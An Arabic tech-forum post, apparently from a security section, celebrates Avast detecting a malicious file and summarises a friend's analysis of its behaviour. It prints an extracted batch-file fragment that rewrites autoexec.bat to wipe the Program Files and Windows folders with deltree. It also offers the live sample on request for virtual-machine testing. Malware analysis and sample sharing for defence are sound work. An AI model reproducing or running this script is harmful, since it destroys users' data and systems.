|
هنيئاً لأصحاب الأفاست بهذا الاكتشاف .. تستاهلون كل خير .. + تحدي ..
بسم الله الرحمن الرحيم السلام عليكم ورحمة الله وبركاته أخواني هذا ملف لم يُكتشف إلا من الأفاست .. قلت في نفسي ما هو معقولة الأفاست الوحيد هو الي مكتشفه فقط .. راسلت حبيب القلب وجدي وتم فصفصته من قبله كالعادة :q: ما شاء الله عليه جهازه مختبر قليلة في حقه :king: صورة من الفصفة :ok: اخي وليد بالفعل الملف مصاب ويحاول حذف ملفات معينه من النظام وخاصه في مجلد البرامج في قرص سي وتظهر هناك عمليه عند تشغيل الملف http://www.zyzoomup.com/vbuser/out.p...-25-213732.jpg http://www.zyzoomup.com/vbuser/out.php?i=11707_2.jpg ويقوم بحقن ملف في هذا المسار \C\Program Files\Mozilla Firefox\extensions وهنا ايضا \C\WINDOWS\SYSTEM32 .................................................. .... جزء من الكود استخرجت كود الفيروس حتى تتأكد echo off@ cls call attrib -h -r c:\autoexec.bat >nul echo @echo off >c:\autoexec.bat echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat .................................................. ................................................. ومن يريد الملف فلا مانع مع العلم إنني أجد من الصعب أن يكتشفه غير الأفاست وطبعاً الجي داتا .. كما أنه يرجى تجربته على الوهمي فقط .. والارسال على حسب القوانين .. http://www.zyzoom.org/vb/showthread.php?t=156517 :king::king::king: أكثر... |
| الساعة الآن 12:19 PM |
Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
منتديات بلاك بيري
mjawshy.net
المجاوشي للتقنية المتقدمة